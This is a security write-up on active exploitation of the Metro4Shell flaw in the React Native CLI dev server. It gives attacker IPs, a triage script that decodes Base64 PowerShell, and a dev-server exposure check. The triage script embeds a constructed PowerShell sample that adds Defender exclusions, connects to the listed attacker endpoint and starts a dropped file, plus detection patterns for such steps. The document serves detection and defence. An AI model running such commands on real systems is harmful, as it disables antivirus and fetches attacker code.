Key Points
- Metro4Shell (CVE-2025-11953), a flaw in the Metro development server shipped with the React Native CLI, is being exploited in the wild.
- It allows an attacker who can reach the dev server over the network to execute arbitrary OS commands on the host; CVSS score 9.8.
- Observed exploitation delivers a Base64-encoded PowerShell script that adds Microsoft Defender exclusions, then fetches and runs a Rust binary.
Introduction to the Exploit
Attackers have begun exploiting a critical weakness in the Metro Development Server, part of the widely used ‘@react-native-community/cli’ npm package. The vulnerability, tracked as CVE-2025-11953 and nicknamed Metro4Shell, was first seen exploited by cybersecurity firm VulnCheck on December 21, 2025. It carries a CVSS score of 9.8 and lets an attacker who can reach the development server over the network execute arbitrary commands on the host running it.
The vulnerability was initially documented by JFrog in November 2025. Despite its severity and the potential for widespread exploitation, it has received little public attention since its disclosure.
Details of the Attack Methodology
In the attacks recorded by VulnCheck’s honeypot network, the attackers use Metro4Shell to run a Base64-encoded PowerShell script. The script first adds Microsoft Defender Antivirus exclusions for the current working directory and the temporary folder, so that the file it is about to drop there is never scanned.
It then opens a raw TCP connection to an attacker-controlled server, downloads a binary over that connection, writes it to disk and executes it. The binary is written in Rust and includes anti-analysis techniques that hinder static analysis and slow down detection.
- Endpoint contacted by the script for the second-stage download: 8.218.43[.]248:60124
- Source IPs of the exploitation attempts: 5.109.182[.]231, 223.6.249[.]141, 134.209.69[.]155
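The behaviours described above are enough to triage process-creation telemetry for this campaign. The following script is an added example (not VulnCheck's, JFrog's or the React Native project's code): it decodes Base64-encoded PowerShell found in log lines, flags the Defender exclusion, the raw TCP download, execution of a dropped file, and the published endpoint and source IPs. The log line format, the field names and the sample script it encodes are constructed for this example; the only assumption about the real attack is that the Metro dev server runs under node, so the PowerShell process has node.exe as its parent.

```python
"""Triage helper for the Metro4Shell post-exploitation pattern (added example)."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# IOCs transcribed from the article (re-fanged).
C2_ENDPOINTS = {("8.218.43.248", 60124)}
ATTACK_SOURCE_IPS = {"5.109.182.231", "223.6.249.141", "134.209.69.155"}

# Behaviours the article attributes to the payload. Indicator names are this example's own.
INDICATOR_PATTERNS = [
    ("defender_exclusion", re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I)),
    ("raw_tcp_client", re.compile(r"Net\.Sockets\.TcpClient", re.I)),
    ("execute_dropped_file", re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I)),
]

# Constructed log format: "<ts> src=<ip> host=<name> parent=<image> cmd=<command line>".
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+host=(?P<host>\S+)\s+"
    r"parent=(?P<parent>\S+)\s+cmd=(?P<cmd>.*)$"
)
ENC_ARG = re.compile(r"-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps_base64(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps_base64(blob: str) -> str:
    """Decode an -EncodedCommand blob (UTF-16LE) or a FromBase64String-style UTF-8 blob."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error:
        return blob  # not valid base64; scan it as-is
    # UTF-16LE-encoded ASCII has a zero byte at every odd offset.
    looks_utf16 = len(raw) % 2 == 0 and all(b == 0 for b in raw[1:40:2])
    return raw.decode("utf-16-le") if looks_utf16 else raw.decode("utf-8", errors="replace")


@dataclass
class Finding:
    host: str
    src_ip: str
    indicators: List[str] = field(default_factory=list)
    decoded: str = ""


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding for a log line that shows any campaign indicator, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    src, host, parent, cmd = m["src"], m["host"], m["parent"], m["cmd"]
    indicators = []
    if src in ATTACK_SOURCE_IPS:
        indicators.append("source_ip_in_ioc_list")
    # Assumption: the dev server runs under node, so the spawned shell's parent is node.exe.
    if parent.lower() == "node.exe" and "powershell" in cmd.lower():
        indicators.append("node_spawned_powershell")
    enc = ENC_ARG.search(cmd)
    script = decode_ps_base64(enc.group(1)) if enc else cmd
    for name, pattern in INDICATOR_PATTERNS:
        if pattern.search(script):
            indicators.append(name)
    for ip, port in C2_ENDPOINTS:
        if ip in script and str(port) in script:
            indicators.append("c2_endpoint")
    if not indicators:
        return None
    return Finding(host, src, indicators, script if enc else "")


def scan(lines) -> List[Finding]:
    return [f for f in map(analyze_line, lines) if f]


# Constructed sample script that mirrors the behaviours described in the article.
# It is not the real payload; the file name is made up.
SAMPLE_SCRIPT = (
    "Add-MpPreference -ExclusionPath (Get-Location).Path; "
    "Add-MpPreference -ExclusionPath $env:TEMP; "
    "$c = New-Object Net.Sockets.TcpClient('8.218.43.248', 60124); "
    "Start-Process \"$env:TEMP\\dropped.exe\""
)

# Constructed log: one line shaped like the attack, one benign encoded command, one unrelated process.
CONSTRUCTED_LOG = [
    "2025-12-21T10:14:02Z src=5.109.182.231 host=devbox01 parent=node.exe "
    "cmd=powershell.exe -nop -w hidden -enc " + encode_ps_base64(SAMPLE_SCRIPT),
    "2025-12-21T10:15:11Z src=10.0.0.5 host=devbox01 parent=explorer.exe "
    "cmd=powershell.exe -enc " + encode_ps_base64("Get-ChildItem C:\\Users"),
    "2025-12-21T10:16:30Z src=10.0.0.8 host=devbox02 parent=cmd.exe cmd=ipconfig /all",
]

if __name__ == "__main__":
    for f in scan(CONSTRUCTED_LOG):
        print(f"{f.host} <- {f.src_ip}: {', '.join(f.indicators)}")
```

Only the first constructed line produces a finding; the benign encoded `Get-ChildItem` and the `ipconfig` process fall through. When you adapt this to real telemetry, keep the decoder: the exclusion and download logic in this campaign is only visible after the Base64 layer is removed, and a rule that matches on the raw command line will see nothing but `-enc` and a blob.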
Analysis and Implications
VulnCheck has characterized these activities as consistent and operational, rather than experimental or exploratory. The persistent use of similar payloads over several weeks suggests a deliberate campaign rather than preliminary testing or vulnerability scanning.
CVE-2025-11953 matters less for the bug itself than for the pattern it illustrates, which recurs across the industry: a development server becomes a production target the moment it is reachable from an untrusted network, whether or not anyone intended to expose it.
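The practical check that follows from this is whether your dev servers are listening on anything other than loopback. The script below is an added example (not from the article, VulnCheck or JFrog) that parses `ss -ltnp` output (a constructed sample is embedded) and reports listeners on Metro's default port 8081 bound to a non-loopback address. The port set is an assumption; extend `DEV_PORTS` if you run Metro or other dev tooling elsewhere.

```python
"""Exposure check for development-server listeners (added example)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List

DEV_PORTS = {8081}  # Metro's default; assumption, add the ports you actually use

# One `ss -ltnp` row: State Recv-Q Send-Q Local:Port Peer:Port Process
SS_LINE = re.compile(
    r"^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+)\s+(?P<peer>\S+)\s*(?P<proc>.*)$"
)

# Constructed sample output: two Metro listeners, one exposed and one on loopback.
CONSTRUCTED_SS = """State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       511     0.0.0.0:8081         0.0.0.0:*          users:(("node",pid=4242,fd=21))
LISTEN  0       511     127.0.0.1:5432       0.0.0.0:*          users:(("postgres",pid=901,fd=6))
LISTEN  0       4096    [::]:22              [::]:*             users:(("sshd",pid=700,fd=3))
LISTEN  0       511     [::1]:8081           [::]:*             users:(("node",pid=4243,fd=21))"""


@dataclass
class Listener:
    host: str
    port: int
    process: str
    exposed: bool


def split_addr_port(s: str):
    """'[::1]:8081' -> ('::1', 8081); '0.0.0.0:8081' -> ('0.0.0.0', 8081)."""
    host, _, port = s.rpartition(":")
    return host.strip("[]"), int(port)


def is_exposed(host: str) -> bool:
    """True unless the bind address is loopback. Wildcards (0.0.0.0, ::, *) count as exposed."""
    if host == "*":
        return True
    return not ipaddress.ip_address(host).is_loopback


def parse_ss(output: str) -> List[Listener]:
    listeners = []
    for line in output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue  # header or non-LISTEN row
        host, port = split_addr_port(m["addr"])
        proc = re.search(r'"([^"]+)"', m["proc"])
        listeners.append(Listener(host, port, proc.group(1) if proc else "?", is_exposed(host)))
    return listeners


def exposed_dev_servers(output: str) -> List[Listener]:
    """Dev-server ports bound to something other than loopback."""
    return [l for l in parse_ss(output) if l.port in DEV_PORTS and l.exposed]


if __name__ == "__main__":
    import subprocess
    try:  # use live data when ss is available, otherwise the constructed sample
        output = subprocess.run(["ss", "-ltnp"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        output = CONSTRUCTED_SS
    for l in exposed_dev_servers(output):
        print(f"EXPOSED: {l.process} listening on {l.host}:{l.port}")
```

On the sample, only the `0.0.0.0:8081` node listener is reported; the `[::1]:8081` one is fine. If you find an exposed Metro, bind it to loopback (check your installed CLI version for a host option on `react-native start`, which this example does not assume) and put a host firewall rule in front of it rather than relying on the dev tool to protect itself.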
Conclusion
The exploitation of Metro4Shell in the React Native CLI package is a reminder that development tooling is an attack surface, not a safe zone: a dev server reachable from the internet is a production host from the attacker’s point of view. Teams using the package should update ‘@react-native-community/cli’ to a release that addresses CVE-2025-11953 (check the advisory for the exact versions), keep Metro bound to loopback or a trusted interface and behind a firewall, and hunt for the indicators above: Defender exclusions added by PowerShell spawned from a node process, and connections to the listed endpoint.
